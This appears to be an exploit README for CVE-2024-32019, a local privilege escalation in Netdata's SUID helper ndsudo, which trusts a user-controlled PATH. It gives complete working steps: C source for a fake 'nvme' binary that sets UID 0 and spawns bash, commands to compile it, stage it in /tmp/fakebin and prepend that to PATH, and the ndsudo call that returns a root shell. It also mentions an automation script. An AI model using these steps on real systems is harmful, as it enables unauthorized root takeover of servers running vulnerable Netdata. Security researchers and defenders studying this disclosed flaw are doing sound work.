CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)
A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.
---
> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.
## 🔍 Overview
**CVE ID**: CVE-2024-32019
**CVSS Score**: 8.8 (High)
**Disclosed**: April 12, 2024
**Component**: Netdata Agent
**Affected Versions**:
- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`
---
## 🧠 Technical Summary
Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.
However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.
---
## 💥 Manual Exploitation Steps
The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.
### 1. Create a Privilege Escalation Binary
Save the following C code as `nvme.c`:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
```
### 2. Compile the Exploit
```bash
gcc nvme.c -o nvme
```
### 3. Prepare the Exploit Environment on the Target
```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```
### 4. Modify the `PATH`
```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```
### 5. Trigger the Exploit
```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```
If successful, you'll get a root shell.
```bash
# whoami
root
```
## Automatic Exploitation
If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.
## 📎 References
- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019:
Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
登录后查看神龙缓存的 POC 文件快照
登录查看